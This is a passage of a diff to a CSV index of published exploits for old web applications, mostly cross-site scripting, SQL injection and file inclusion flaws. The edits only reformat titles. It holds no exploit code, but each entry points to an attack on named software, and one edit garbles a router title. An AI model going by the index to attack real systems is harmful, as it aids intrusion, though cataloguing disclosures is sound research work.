Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 @@ -31699,7 +31710,7 @@ id,file,description,date,author,platform,type,port 30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - default.asp mode2 Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 -30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - Dnewsweb.exe Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 +30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30651,platforms/php/webapps/30651.txt,"Joomla! Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0 @@ -31708,7 +31719,7 @@ id,file,description,date,author,platform,type,port 30657,platforms/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 -30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection",2007-10-11,durito,php,webapps,0 +30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,php,webapps,0 30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 @@ -31733,7 +31744,7 @@ id,file,description,date,author,platform,type,port 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 -31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0 +31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 @@ -31751,7 +31762,7 @@ id,file,description,date,author,platform,type,port 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - index.asp SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 -30712,platforms/php/webapps/30712.txt,"Multi-Forums - Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 +30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Parameter Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 @@ -31788,7 +31799,7 @@ id,file,description,date,author,platform,type,port 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 -30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 +30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections",2007-11-17,"Aria-Security Team",asp,webapps,0 30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 @@ -31813,8 +31824,8 @@ id,file,description,date,author,platform,type,port 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 -30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 -30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injection",2007-12-04,"Adrian Pastor",asp,webapps,0 +30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 +30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps,0 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -31838,7 +31849,7 @@ id,file,description,date,author,platform,type,port 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 - register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 -30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 +30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 @@ -31866,7 +31877,7 @@ id,file,description,date,author,platform,type,port 30931,platforms/php/webapps/30931.txt,"Logaholic - 'index.php' conf Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30932,platforms/php/webapps/30932.txt,"Logaholic - profiles.php newconfname Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Parameter Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 -30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection",2007-12-24,bypass,asp,webapps,0 +30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,asp,webapps,0 30940,platforms/asp/webapps/30940.txt,"IPortalX - forum/login_user.asp Multiple Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 30941,platforms/asp/webapps/30941.txt,"IPortalX - blogs.asp Date Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 @@ -31904,15 +31915,15 @@ id,file,description,date,author,platform,type,port 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - admin.php Cross-Site Request Forgery",2008-01-07,L4teral,php,webapps,0 30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 - view.php s Parameter Cross-Site Scripting",2008-01-07,L4teral,php,webapps,0 -30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 -30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 +30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 +30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps,0 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,php,webapps,0 -31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 @@ -31921,7 +31932,7 @@ id,file,description,date,author,platform,type,port 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 31020,platforms/php/webapps/31020.txt,"Moodle 1.8.3 - 'install.php' Cross-Site Scripting",2008-01-12,"Hanno Bock",php,webapps,0 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps,0 -31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection",2008-01-16,waraxe,php,webapps,0 +31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 @@ -31930,7 +31941,7 @@ id,file,description,date,author,platform,type,port 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 31044,platforms/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 -31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection",2008-01-22,RawSecurity.org,php,webapps,0 +31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injections",2008-01-22,RawSecurity.org,php,webapps,0 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,php,webapps,0 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 @@ -31977,7 +31988,7 @@ id,file,description,date,author,platform,type,port 31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0 31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Parameter Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps,0 -31117,platforms/asp/webapps/31117.txt,"Ipswitch WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 +31117,platforms/asp/webapps/31117.txt,"Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-07,"Alexandr Polyakov",php,webapps,0 31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 @@ -32001,7 +32012,7 @@ id,file,description,date,author,platform,type,port 31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - graph.php view_type Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - graph_view.php filter Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 -31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple Parameter SQL Injections",2008-02-12,aScii,php,webapps,0 31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 - graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0 @@ -32026,7 +32037,7 @@ id,file,description,date,author,platform,type,port 31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - spyce/examples/request.spy name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 -31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection",2008-02-13,S@BUN,asp,webapps,0 +31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections",2008-02-13,S@BUN,asp,webapps,0 31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 @@ -32065,8 +32076,8 @@ id,file,description,date,author,platform,type,port 31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 - ajax_request.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 - slim.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 @@ -32200,7 +32211,7 @@ id,file,description,date,author,platform,type,port 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -32255,7 +32266,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php zID Parameter' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -32282,7 +32293,7 @@ id,file,description,date,author,platform,type,port 31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 -31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B (ADSL Router) - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 +31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 @@ -32316,7 +32327,7 @@ id,file,description,date,author,platform,type,port 31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 - robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0 31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 -31617,platforms/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 +31617,platforms/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0 31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,java,webapps,0 31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0 @@ -32394,9 +32405,9 @@ id,file,description,date,author,platform,type,port 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php cID Parameter' SQL 